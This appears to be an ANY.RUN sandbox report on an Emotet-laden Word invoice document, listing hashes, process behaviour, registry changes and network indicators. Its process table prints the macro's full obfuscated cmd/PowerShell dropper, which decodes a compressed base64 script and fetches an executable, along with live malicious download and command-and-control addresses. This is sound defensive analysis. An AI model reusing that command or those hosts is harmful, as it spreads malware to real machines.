analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INVOICE_NO_SMO_86257465.doc

Full analysis: https://app.any.run/tasks/2077b67e-f5ab-4e3b-8935-78f00e4d9737
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 09:31:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Kennedy-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

FD921C3D89F2B322F439710A2D8D218F

SHA1:

290AF6ABFED0F70936EC4840580ACF8C64A2CBC7

SHA256:

2E8C933B1A647C86A2B97C1AAAD5F8670272F3A6CD991BDEF59513F9E9516127

SSDEEP:

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkDIsDPjEed72g:VZLocn1kp59gxBK85fBt+a99dS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 509.exe (PID: 3784)
      • lpiograd.exe (PID: 2328)
      • lpiograd.exe (PID: 3952)
      • 509.exe (PID: 3840)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1716)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1716)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 2328)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1072)
    • EMOTET was detected

      • lpiograd.exe (PID: 2328)
    • Connects to CnC server

      • lpiograd.exe (PID: 2328)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1072)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1072)
      • 509.exe (PID: 3840)
    • Executes PowerShell scripts

      • CMD.exe (PID: 2544)
    • Starts itself from another location

      • 509.exe (PID: 3840)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1716)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1716)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:48:00
CreateDate: 2018:11:07 16:48:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Kennedy-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 509.exe no specs 509.exe lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
1716"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_NO_SMO_86257465.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2544CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^| %{ $_.rEadTOENd( ) })^|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1072POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3784"C:\Users\admin\AppData\Local\Temp\509.exe" C:\Users\admin\AppData\Local\Temp\509.exepowershell.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3840"C:\Users\admin\AppData\Local\Temp\509.exe"C:\Users\admin\AppData\Local\Temp\509.exe
509.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
3952"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe509.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Exit code:
0
Version:
2
2328"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Micro
Integrity Level:
MEDIUM
Description:
Microsof
Version:
2
Total events
1 674
Read events
1 260
Write events
409
Delete events
5

Modification events

(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:lli
Value:
6C6C6900B4060000010000000000000000000000
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(1716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(1716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(1716) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
B40600007CF3F2E64577D40100000000
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:umi
Value:
756D6900B406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:umi
Value:
756D6900B406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(1716) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR944C.tmp.cvr
MD5:
SHA256:
1072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXH6OAPG9D2MPCTP3J4V.temp
MD5:
SHA256:
1072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5d9fa6.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1072powershell.exeC:\Users\admin\AppData\Local\Temp\509.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
1716WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$VOICE_NO_SMO_86257465.docpgc
MD5:D832341FD762418E6F25A3958081BCBF
SHA256:1FCF2BADB500B3D25723D57B7F8194E0FECFA22AFD84828A1B3E0673CCDCED4A
1716WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
3840509.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:63287FA5A786B27EAD904CF0B51351A4
SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2328
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
1072
powershell.exe
GET
200
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC/
US
executable
132 Kb
malicious
1072
powershell.exe
GET
301
132.148.249.54:80
http://www.amenterprise.info/RiI6wTzC
US
html
246 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1072
powershell.exe
132.148.249.54:80
www.amenterprise.info
GoDaddy.com, LLC
US
suspicious
2328
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious

DNS requests

Domain
IP
Reputation
www.amenterprise.info
  • 132.148.249.54
malicious

Threats

PID
Process
Class
Message
1072
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
1072
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1072
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1072
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2328
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info